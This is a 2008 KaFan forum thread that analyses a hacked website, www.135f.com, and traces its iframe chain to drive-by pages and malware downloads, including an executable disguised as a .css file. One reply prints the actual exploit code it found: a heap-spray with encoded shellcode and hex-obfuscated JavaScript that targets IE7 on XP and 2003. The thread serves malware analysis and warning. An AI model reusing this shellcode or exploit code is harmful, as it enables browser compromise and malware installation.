查看: 10866|回复: 12
收起左侧

[其它] hxxp://www.135f.com[挂马][已确认 by aarwwefdds]

[复制链接]
250662772
发表于 2008-12-20 17:34:47 | 显示全部楼层 |阅读模式
网页分析结果如下(250662772).
[wide]http://www.135f.com
    [script]http://www.135f.com/inc/main.js
    [script]http://www.135f.com/adfile/banner.js
        [script]http://a.alimama.cn/inf.js
        [frame]http://www.rxgssllk.cn/llbw/9.htm
            [frame]http://wm.sllbqsb.cn/a297/fxx.htm
                [frame]http://wm.sllbqsb.cn/a297/fx.htm
                    [frame]http://wm.sllbqsb.cn/a297/Ilink.html
                    [frame]http://wm.sllbqsb.cn/a297/flink.html
                [frame]http://wm.sllbqsb.cn/a297/../a1/ss.htm
                    [object]http://down.erhaha2.cn/down/ko.exe
                [frame]http://wm.sllbqsb.cn/a297/../a1/ms06014.htm
                    [object]http://down.erhaha2.cn/new/a1.css
                [frame]http://wm.sllbqsb.cn/a297/../a1/sina.htm
                    [object]http://down.erhaha2.cn/new/a1.css
                [frame]http://wm.sllbqsb.cn/a297/../a1/no.htm
                    [object]http://down.erhaha2.cn/new/a1.css
                [frame]http://wm.sllbqsb.cn/a297/../a1/bfyy.htm
                [frame]http://wm.sllbqsb.cn/a297/../a1/GLWORLD.html
                    [object]http://down.erhaha2.cn/new/a1.css
                [frame]http://wm.sllbqsb.cn/a297/../a1/real.htm
                    [object]http://down.erhaha2.cn/new/a1.css
                [frame]http://wm.sllbqsb.cn/a297/../a1/real.html
                    [object]http://down.erhaha2.cn/new/a1.css
            [script]http://js.tongji.cn.yahoo.com/857122/ystet.js
    [script]http://www.135f.com/js/tongji1.js
    [script]http://www.135f.com/adfile/top.js
    [script]http://www.135f.com/js/shang.js
    [script]http://www.135f.com/js/zhong.js
    [script]http://www.135f.com/js/zhong2.js
    [script]http://www.135f.com/js/xia.js
    [script]http://www.135f.com/js/255.js
    [script]http://www.135f.com/js/jieshao7.js
    [script]http://www.135f.com/count.asp?id=1
    [script]http://www.135f.com/js/tongji.js
    [script]http://www.135f.com/js/zuidi.js
    [script]http://www.135f.com/adfile/footer.js
    [script]http://www.135f.com/count.asp


已帮助修改标题    by shmily512099


已确认
帮助修改标题
by aarwwefdds


[ 本帖最后由 aarwwefdds 于 2008-12-20 20:12 编辑 ]
2008fans
发表于 2008-12-20 19:12:18 | 显示全部楼层
楼主,我是个新手,我用FreShow怎样没有检测到这个135f网页上有这么多frame呢?只找到一堆JS,能否指点一二?
Log is generated by FreShow.
[wide]http://www.135f.com
    [script]http://www.135f.com/inc/main.js
    [script]http://www.135f.com/adfile/banner.js
    [script]http://www.135f.com/js/tongji1.js
    [script]http://www.135f.com/adfile/top.js
    [script]http://www.135f.com/js/shang.js
    [script]http://www.135f.com/js/zhong.js
    [script]http://www.135f.com/js/zhong2.js
    [script]http://www.135f.com/js/xia.js
    [script]http://www.135f.com/js/255.js
    [script]http://www.135f.com/js/jieshao7.js
    [script]http://www.135f.com/count.asp?id=1
    [script]http://www.135f.com/js/tongji.js
    [script]http://www.135f.com/js/zuidi.js
    [script]http://www.135f.com/adfile/footer.js
    [script]http://www.135f.com/count.asp
250662772
 楼主| 发表于 2008-12-20 19:16:30 | 显示全部楼层
你从这里面一层一层分析[script]http://www.135f.com/adfile/banner.js
2008fans
发表于 2008-12-21 13:17:52 | 显示全部楼层
谢谢楼主了,终于可以找到那么多的frame了,但是http://wm.sllbqsb.cn/a297/../a1/ss.htm地址下的KO.exe我却怎么也解不出来,只好把ss.htm上的那两段代码拷上来,希望楼主能指点一下:
</script>       
<script>
var a1="%u";spray(a1+"9090"+a1+"%u9090%u9090%uE1D9%u34D9%u5824%u5858%u3358%uB3DB%u031C%u31C3%u66C9%uE981%uFA65%u3080%u4021%uFAE2%u17C9%u2122%u4921%u0121%u2121%u214B%uF1DE%u2198%u2131%uAA21%uCAD9%u7F24%u85D2%uF1DE%uD7C9%uDEDE%uC9DE%u221C%u2121%uD9AA%u19C9%u2121%uC921%u206C%u2121%u67C9%u2121%uC921%u22FA%u2121%uD9AA%u03C9%u2121%uC921%u2065%u2121%u11C9%u2121%uC921%u22A8%u2121%uD9AA%u2DC9%u2121%uC921%u2040%u2121%u3BC9%u2121%uCA21%u7279%uFDAA%u4B72%u4961%u3121%u2121%uC976%u2390%u2121%uC4C9%u2121%u7921%u72E2%uFDAA%u4B72%u4901%u3121%u2121%uC976%u23B8%u2121%uECC9%u2121%u7921%u76E2%u1DC9%u2125%uAA21%u12D9%u68E8%uE112%uE291%uD3DD%uAC8F%uDE66%uE27E%u1F7A%u26E7%u1F99%u7EA8%u4720%uE61F%u2466%uC1DE%uC8E2%u25B4%u2121%uA07A%u35CD%u2120%uAA21%u1FF5%u23E6%u4C42%u0145%uE61F%u2563%u420E%u0301%uE3A2%u1229%u71E1%u4971%u2025%u2121%u7273%uC971%u22E0%u2121%uF1DE%uDDAA%uE6AA%uE1A2%u1F29%u39AB%uFAA5%u2255%uCA61%u1FD7%u21E7%u1203%u1FF3%u71A9%uA220%u75CD%uE112%uFA12%uEDAA%uD9A2%u5C75%u1F28%u3DA8%uA220%u25E1%uD3CA%uEDAA%uF8AA%uE2A2%u1231%u1FE1%u62E6%u200D%u2121%u7021%u7172%u7171%u7171%u7671%uC971%u2218%u2121%u38C9%u2121%u4521%u2580%u2121%uAC21%u4181%uDEDE%uC9DE%u2216%u2121%uFA12%u7272%u7272%uF1DE%u19A1%uA1C9%uC819%u2E54%u59A0%uB124%uB1B1%u55B1%u7427%uCDAA%u61AC%uDE24%uC9C1%uDE0F%uDEDE%uC9E2%uDE09%uDEDE%u3099%u2520%uE3A1%u212D%u3AC9%uDEDE%u12DE%u71E1%uC975%u2175%u2121%uC971%u23AA%u2121%uF1DE%uA117%u051D%u5621%uC92B%u2360%u2121%uDE12%uDE76%uC9F1%u20DA%u2121%uDE49%u2121%uDE21%uC9F1%uDFC9%uDEDE%u7672%u1277%u71E1%uC975%u213F%u2121%uC971%u2374%u2121%uF1DE%uA117%u051D%u5621%uC92B%u232A%u2121%uDE12%uDE76%u79F1%u7E7F%uE27A%u23CA%uE279%uD8C9%uDEDE%u77DE%uA276%u29CD%uDDAA%u294B%u1F76%u56DE%uC935%u237C%u2121%uF1DE%uDDAA%u4049%u444C%u4921%u6468%u5367%uD5AA%u2998%u2121%uD221%u5487%u4B0E%u1F21%u55DE%u0105%u05C9%u2123%uDE21%uAAF1%uC9D9%u20EA%u2121%uF1DE%uD91A%u2955%uAA17%u0565%u1F01%u21DE%uDE1F%u0555%uC93D%u20CE%u2121%uF1DE%uE5A2%u7E31%u997F%u2120%u2121%u49E2%u4F4E%u2121%u5449%u4D53%uCA4C%uAC34%u0565%u7125%u03C9%uDEDF%u71DE%u6BC9%u2123%uC821%uDFC3%uDEDE%uC7C9%uDEDE%uA2DE%u29E5%u4BE2%u494D%u554F%u4D45%u34CA%u65AC%u2505%uC971%uDCDA%uDEDE%uC971%u2302%u2121%u9AC8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u1249%u2113%u4921%u5254%u5344%u34CA%u65AC%u2505%uC971%uDCF0%uDEDE%uC971%u20D8%u2121%uB0C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u4249%u5657%u4921%u4952%u4E45%u34CA%u65AC%u2505%uC971%uDC86%uDEDE%uC971%u20EE%u2121%u46C8%uDEDF%uC9DE%uDEC7%uDEDE%uE5A2%uE229%u5749%u5946%uCA21%uAC34%u0565%u7125%uA3C9%uDEDC%u71DE%u8BC9%u2120%uC821%uDF63%uDEDE%uC7C9%uDEDE%uA2DE%u25E5%uC9E2%u208A%u2121%u3A49%u67E7%u7158%uE7C9%u2120%uA221%u29E5%uC9E2%u20B6%u2121%uCD49%u22B6%u712D%u93C9%u2120%uA221%u29E5%uC9E2%u20A2%u2121%u8B49%u2CDD%u715D%uBFC9%u2120%uA221%u29E5%uC9E2%u204E%u2121%uCC49%uCE77%u7117%uABC9%u2120%uA221%u29E5%uC9E2%u207A%u2121%uD149%u25AB%u717E%u57C9%u2120%uA221%u29E5%uC9E2%uDFD6%uDEDE%u5949%uFA49%u713D%u43C9%u2120%uA221%u29E5%uC9E2%u2012%u2121%uCE49%uC1EF%u7141%u6FC9%u2120%uA221%u29E5%uC9E2%u203E%u2121%u9149%u0C68%u71FA%u1BC9%u2120%uA221%u29E5%uC9E2%uDE17%uDEDE%u8A49%uBA7F%u713F%u07C9%u2120%uA221%u29E5%uC9E2%uDF86%uDEDE%u7849%uA0B6%u7123%u33C9%u2120%uA221%u29E5%uC9E2%u21C2%u2121%u5F49%uC3F9%u7152%uDFC9%u2121%uA221%u29E5%uC9E2%u21EE%u2121%uBF49%u9AD8%u7114%uCBC9%u2121%uA221%u29E5%uC9E2%uDFB3%uDEDE%u7649%u9481%u719A%uF7C9%u2121%uA221%u29E5%uC9E2%uDF5F%uDEDE%u3B49%u3F5B%u7123%uE3C9%u2121%uA221%u29E5%uC9E2%uDF4B%uDEDE%uC149%u117A%u71B5%u8FC9%u2121%uA221%u29E5%uC9E2%uDF77%uDEDE%uB649%uC3E8%u7182%uBBC9%u2121%uA221%u29E5%uC9E2%uDF63%uDEDE%u4949%uE405%u7192%uA7C9%u2121%uA221%u29E5%uC9E2%u2176%u2121%u5349%u92DF%u7137%u53C9%u2121%uA221%u29E5%uC9E2%uDF65%uDEDE%u32CA%u444B%uC971%uDAD6%uDEDE%uC971%uDF8A%uDEDE%u96C8%uDEDD%uC9DE%uDEC9%uDEDE%uC9E2%uDC88%uDEDE%u6E49%u6ECE%u7124%u1FC9%u2121%uA221%u29E5%uC9E2%u212E%u2121%uAF49%u2F6F%u71CD%u0BC9%u2121%uA221%u29E5%u12E2%u45E1%u61AA%uA411%u59E1%u1F31%u61AA%u1F2D%u51AA%u8C3D%uAA1F%u2961%uCAE2%u1F2A%u61AA%uA215%u5DE1%uAA1F%u1D61%u41E2%uAA17%u054D%u1705%u64AA%u171D%u75AA%u5924%uF422%uAA1F%u396B%uAA1F%u017B%uFC22%u1AC2%u1F68%u15AA%u22AA%u12D4%u12DE%uDDE1%uA58D%u55E1%uE026%u2CEE%uD922%uD5CA%u1A17%u055D%u5409%u1FFE%u7BAA%u2205%u47FC%uAA1F%u6A2D%uAA1F%u3D7B%uFC22%uAA1F%uAA25%uE422%uA817%u0565%u403D%uC9E2%uDA47%uDEDE%u5549%u5155%u0e1b%u450e%u564e%u0f4f%u5344%u4049%u4049%u0f13%u4f42%u450e%u564e%u0e4f%u4e4a%u440f%u4459%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u2121%u0021");
</script>       
<script>
sleep(0);
</script>       
<script>       
nav=navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"]["\x74\x6f\x4c\x6f\x77\x65\x72\x43\x61\x73\x65"]();
if(navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x4d\x53\x49\x45')!=-1){
        version=window["\x70\x61\x72\x73\x65\x46\x6c\x6f\x61\x74"](navigator["\x61\x70\x70\x56\x65\x72\x73\x69\x6f\x6e"]["\x73\x70\x6c\x69\x74"]('\x4d\x53\x49\x45')[1])
}if(version==7){
        w2k3=((nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x6e\x74 \x35\x2e\x32')!=-1)||(nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x32\x30\x30\x33')!=-1));
        wxp=((nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x6e\x74 \x35\x2e\x31')!=-1)||(nav["\x69\x6e\x64\x65\x78\x4f\x66"]('\x77\x69\x6e\x64\x6f\x77\x73 \x78\x70')!=-1));
        if(wxp||w2k3)window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x58\x4d\x4c \x49\x44\x3d\x49\x3e\x3c\x58\x3e\x3c\x43\x3e\x3c\x21\x5b\x43\x44\x41\x54\x41\x5b\x3c\x69\x6d\x61\x67\x65 \x53\x52\x43\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x26\x23\x31\x31\x34\x3b\x26\x23\x32\x35\x37\x30\x3b\x26\x23\x31\x31\x34\x3b\x2e\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x5d\x5d\x3e\x3c\x21\x5b\x43\x44\x41\x54\x41\x5b\x3e\x5d\x5d\x3e\x3c\x2f\x43\x3e\x3c\x2f\x58\x3e\x3c\x2f\x78\x6d\x6c\x3e\x3c\x53\x50\x41\x4e \x44\x41\x54\x41\x53\x52\x43\x3d\x23\x49 \x44\x41\x54\x41\x46\x4c\x44\x3d\x43 \x44\x41\x54\x41\x46\x4f\x52\x4d\x41\x54\x41\x53\x3d\x48\x54\x4d\x4c\x3e\x3c\x58\x4d\x4c \x49\x44\x3d\x49\x3e\x3c\x2f\x58\x4d\x4c\x3e\x3c\x53\x50\x41\x4e \x44\x41\x54\x41\x53\x52\x43\x3d\x23\x49 \x44\x41\x54\x41\x46\x4c\x44\x3d\x43 \x44\x41\x54\x41\x46\x4f\x52\x4d\x41\x54\x41\x53\x3d\x48\x54\x4d\x4c\x3e\x3c\x2f\x53\x50\x41\x4e\x3e');
wsmj888
发表于 2008-12-21 13:33:27 | 显示全部楼层
进去没有异常!
2008fans
发表于 2008-12-21 13:41:28 | 显示全部楼层
我的卡巴也没有报异常,可确实存在病毒,不知道怎么回事。我也把http://down.erhaha2.cn/new/a1.css
下载下来了,用记事本看不懂,小白中!!!!
2008fans
发表于 2008-12-21 13:43:51 | 显示全部楼层
楼主能告诉我这种网页的危害吗?
雨宫优子
发表于 2008-12-21 13:47:18 | 显示全部楼层
原帖由 2008fans 于 2008-12-21 13:17 发表
谢谢楼主了,终于可以找到那么多的frame了,但是http://wm.sllbqsb.cn/a297/../a1/ss.htm地址下的KO.exe我却怎么也解不出来,只好把ss.htm上的那两段代码拷上来,希望楼主能指点一下:
        

var a1="%u";spray(a1+" ...

当然解不出来啦....
这个有XOR加密


要靠非常规方法


具体请看我的教程
http://bbs.kafan.cn/thread-387608-1-1.html
雨宫优子
发表于 2008-12-21 13:48:32 | 显示全部楼层
原帖由 2008fans 于 2008-12-21 13:41 发表
我的卡巴也没有报异常,可确实存在病毒,不知道怎么回事。我也把http://down.erhaha2.cn/new/a1.css
下载下来了,用记事本看不懂,小白中!!!!

这个是伪装的CSS文件,其实是EXE,把后缀名改了就知道了
2008fans
发表于 2008-12-21 14:19:47 | 显示全部楼层
谢谢,好好学习一下
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 08:21 , Processed in 0.124408 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表